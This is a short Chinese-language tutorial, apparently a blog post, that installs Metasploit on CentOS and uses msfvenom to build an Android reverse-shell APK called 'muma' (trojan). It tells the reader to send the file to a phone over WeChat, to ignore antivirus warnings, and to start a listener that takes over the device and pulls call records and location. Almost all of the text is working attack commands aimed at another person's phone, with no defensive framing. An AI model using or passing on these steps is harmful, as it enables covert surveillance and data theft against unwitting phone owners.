貓寧~~~

操作系統centos7，可以本地部署，也可以買一臺云服務器，例如騰訊，阿里的，首次購買都不太貴。

使用寶塔SSH終端連接，兼有SFTP上傳下載

https://www.bt.cn/download/term.html

下載metasploit程序包

wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run

安裝ruby

yum -y install ruby

給予程序運行的權限

chmod +x metasploit-latest-linux-x64-installer.run

執行程序

./metasploit-latest-linux-x64-installer.run

提示continue的回車，提示是否是選擇y即可

輸入命令，進入，顯示安裝成功

msfconsole

root目錄下執行如下命令，生成muma.apk的文件

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.100.100 LPORT=10000 R > muma.apk

借助微信發送到手機上，安裝，如果安全軟件提示木馬，繼續安裝就好，app顯示名稱為MainActivity

msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.100.100

set lport 10000

run

獲取手機權限

使用help，查看相關的命令操作，如下可以獲取對方的通信記錄和地理位置信息。

over~~~